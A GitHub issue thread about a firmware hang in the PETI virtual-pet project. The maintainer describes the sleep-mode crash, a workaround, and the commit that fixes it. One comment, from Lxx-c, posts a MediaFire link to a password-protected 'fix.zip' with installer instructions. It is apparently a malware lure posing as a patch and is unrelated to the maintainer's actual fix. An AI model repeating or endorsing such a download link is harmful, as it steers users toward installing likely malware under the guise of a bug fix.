### ISSUE TITLE
[BUG] Possible Crash (or Other Misbehaviours) in Sleeping activity level

### ISSUE THREAD

**Issue by ZAdamMac** [ZAdamMac/PETI#45]
Firmware Version String: `v/0.4.0 - dev`

Issue Description: During the sleeping activity level, if the lights are turned off (by selecting the lightbulb icon on the main game screen), the game apparently halts. It's not clear what the cause of this issue is, but the following symptoms appear:
- Thereafter, the display no longer registers any activity with respect to user inputs on the control daughterboard's buttons.
- the VCOM LED, if connected, continues to pulsate at the expected rate.
- The screen is never put to sleep after the expected timeout but remains on for the duration.
- The pet's wakeup trigger does not correctly set the pet back to awake, return the in-game lights to "on", or restart the display (meaning it may not be triggered at all).
- The pet, on waking, either does not take any hunger/fun degradation or takes so little that there is no alert registered (neither the audio alert nor LED expected on wake OR hunger-alert are triggered).

Workaround: Do not toggle the lights for a sleeping pet OR press the BOR reset switch on the development board and continue the game without resetting the save data the following morning.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZAdamMac** [comment]
Issue is confirmed to affect the `v.0.4.0` version string, not just the development build. Which fits given when those strings were updated.

**Comment by ZAdamMac** [comment]
This is corrected by commit [f6dfc61](https://github.com/ZAdamMac/PETI/commit/f6dfc6119f75f5622507f97188b9b33ac620fbfc). The issue was that a function for drawing the status speech-bubble which is called when the lights are out in `scenes/main_game.c` was being called in an unsupported way. This causes a program crash which gets the device stuck in an ISR loop.

The commit in question is being pushed to `v/0.4.1`
